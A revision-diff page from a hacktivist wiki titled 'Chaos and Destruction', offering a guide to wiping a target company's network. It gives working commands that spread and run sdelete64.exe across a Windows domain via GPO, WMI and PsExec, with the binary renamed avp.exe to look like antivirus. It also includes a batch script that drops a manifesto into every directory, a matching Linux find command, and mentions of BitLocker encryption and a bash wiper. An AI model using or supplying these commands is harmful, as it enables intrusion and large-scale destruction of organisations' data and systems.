Chaos and Destruction: Difference between revisions

From Enlace Hacktivista
Jump to navigation Jump to search
Line 13: Line 13:
When it comes time to destroy your targets network as demonstrated by the [https://kolektiva.media/w/twJjCTkvumnugRy61BjD3T HackBack video Guacamaya made] it's best to use [https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete sdelete] as it's a microsoft developed and signed application removing the need to disable security products before it's spread and execution. Below we showcase various different ways to weaponize sdelete64.exe application across the network of your target.
When it comes time to destroy your targets network as demonstrated by the [https://kolektiva.media/w/twJjCTkvumnugRy61BjD3T HackBack video Guacamaya made] it's best to use [https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete sdelete] as it's a microsoft developed and signed application removing the need to disable security products before it's spread and execution. Below we showcase various different ways to weaponize sdelete64.exe application across the network of your target.


'''Method 1:''' Using Group Policy Objects (GPO) and Scheduled tasks to spread sdelete64.exe across the domain
'''Method 1:''' Using Group Policy Objects (GPO) and Scheduled tasks to spread sdelete64.exe across a domain
* [https://enlacehacktivista.org/index.php?title=Pronico#Video_Timeline Guacamaya] (2:13:35 Wiping windows domain with [https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete sdelete] on the domain controller) <code>sdelete64.exe -accepteula -r -s C:\*</code>
* [https://enlacehacktivista.org/index.php?title=Pronico#Video_Timeline Guacamaya] (2:13:35 Wiping windows domain with [https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete sdelete] on the domain controller) <code>sdelete64.exe -accepteula -r -s C:\*</code>


Revision as of 23:26, 28 July 2023

Companies have large networks consisting of both Windows and Linux systems, so if your end goal is not only leaking data to journalists but to also destroy your target then using a wiper will be the best way to achieve this goal, just make sure not to wipe critical services that may impact someones physical safety as demonstrated in Guacamaya's HackBack video, we want to destroy data, not harm human life.

Windows

Print your manifesto

@echo off
set "manifesto=C:\Users\Administrator\AppData\Local\Temp\manifesto.txt"
for /r "C:\" %%d in (.) do (
    xcopy "%manifesto%" "%%d\" /Y
)

Wiping Windows Domain

When it comes time to destroy your targets network as demonstrated by the HackBack video Guacamaya made it's best to use sdelete as it's a microsoft developed and signed application removing the need to disable security products before it's spread and execution. Below we showcase various different ways to weaponize sdelete64.exe application across the network of your target.

Method 1: Using Group Policy Objects (GPO) and Scheduled tasks to spread sdelete64.exe across a domain

  • Guacamaya (2:13:35 Wiping windows domain with sdelete on the domain controller) sdelete64.exe -accepteula -r -s C:\*

Method 2: Using batch files to spread sdelete64.exe utilizing Windows Management Instrumentation (WMI)

On the domain controller get list of server names:

  • net view /all /domain

Copy

Running as the domain admin, copy the sdelete64.exe binary file to all servers in your list:

  • for /f %%i in (servers.txt) do copy "C:\Windows\Temp\sdelete64.exe" "\\%%i\C$\Windows\avp.exe"

Specify account credentials:

  • start wmic /node:"<COMPUTER>" /user:"<USER>" /password:"<PASSWORD>" process call create "cmd.exe /c copy \\SHARE\C$\Windows\Temp\sdelete64.exe C:\Windows\avp.exe"

Execute

Running as the domain admin now execute:

  • for /f %%i in (servers.txt) do wmic /node:%%i process call create "cmd.exe /c C:\Windows\avp.exe -accepteula -r -s C:\*"

Specify account credentials:

  • start wmic /node:"<COMPUTER>" /user:"<USER>" /password:"<PASSWORD>" process call create "cmd.exe /c C:\Windows\avp.exe -accepteula -r -s C:\*"

Method 3: Using PsExec to run sdelete64.exe across the network

  • start PsExec.exe -d @C:\Windows\Temp\servers.txt -u DOMAIN\Administrator -p Passw0rd123! cmd /c C:\Windows\Temp\sdelete64.exe -accepteula -r -s C:\*

Encrypt Windows Domain

Encrypt Windows Domain (1:24:16 Wiping windows domain with Bitlocker)

Linux

Print your manifesto

  • find ~/ -type d -exec cp -R /tmp/manifesto.txt {} \;

Wiping Linux System

Wipe a Linux system using a bash wiper.

Retrieved from "https://enlacehacktivista.org/index.php?title=Chaos_and_Destruction&oldid=1292"